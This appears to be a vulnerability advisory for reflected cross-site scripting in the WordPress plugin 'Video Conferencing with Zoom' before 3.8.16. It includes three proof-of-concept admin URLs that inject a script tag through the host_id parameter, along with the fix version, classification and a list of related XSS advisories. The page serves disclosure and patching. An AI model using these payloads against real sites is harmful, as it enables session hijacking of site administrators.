Video Conferencing with Zoom < 3.8.16 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape user data before outputting it back in attributes in some admin pages, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=zoom-meetings&page=zoom-video-conferencing&host_id="><script>alert(/XSS/)</script>

https://example.com/wp-admin/edit.php?post_type=zoom-meetings&page=zoom-video-conferencing-add-meeting&host_id="><script>alert(/XSS/)</script>

https://example.com/wp-admin/edit.php?post_type=zoom-meetings&page=zoom-video-conferencing-webinars&new=zoom-video-conferencing-webinars-add&host_id="><script>alert(/XSS/)</script>

Affects Plugins

video-conferencing-with-zoom-api

Fixed in 3.8.16

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

47d054c5-d2fc-4a75-b9d4-9fe327caf66b

Timeline

Publicly Published

2021-11-30 (about 4 years ago)

Added

2021-11-30 (about 4 years ago)

Last Updated

2021-11-30 (about 4 years ago)

Other

Published

Title

Published

2025-01-16

Title

Singsys -Awesome Gallery <= 1.0 - Reflected Cross-Site Scripting

Published

2020-12-04

Title

Themify Portfolio Post < 1.1.6 - Authenticated Stored Cross-Site Scripting

Published

2025-10-23

Title

qnotsquiz <= 1.0.0 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2025-04-11

Title

SKT Skill Bar < 2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-05-28

Title

Smash Balloon Instagram Feed < 6.9.1 - Contributor+ Stored XSS via `data-plugin` Attribute